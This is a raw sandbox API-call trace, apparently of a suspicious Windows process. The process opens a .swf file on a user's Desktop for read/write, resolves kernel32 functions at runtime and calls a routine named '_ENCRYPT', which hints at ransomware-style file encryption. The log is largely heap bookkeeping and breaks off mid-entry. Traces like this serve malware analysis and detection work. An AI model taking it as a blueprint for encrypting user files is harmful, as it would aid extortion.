[0030.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0030.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x936008 [0030.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0030.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x51) returned 0x794b90 [0030.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf", cchWideChar=81, lpMultiByteStr=0x794b90, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf", lpUsedDefaultChar=0x0) returned 81 [0030.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0030.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.599] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\atelwg4 7fdtq.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0030.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0030.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x936008, cbMultiByte=81, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0030.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa2) returned 0x7c5448 [0030.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x936008, cbMultiByte=81, lpWideCharStr=0x7c5448, cchWideChar=81 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf") returned 81 [0030.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0030.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c55e8 [0030.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0030.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x936008 | out: hHeap=0x770000) returned 1 [0030.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0030.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0030.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0030.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0030.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0030.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.602] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0030.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0030.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0030.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0030.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.603] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0030.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0030.604] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.604] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0030.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.605] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca30 [0030.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ca30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0030.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.605] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0030.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0030.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.606] CloseHandle (hObject=0x128) returned 1 [0030.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0030.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.606] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.606] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0030.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.607] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.607] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0030.607] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, 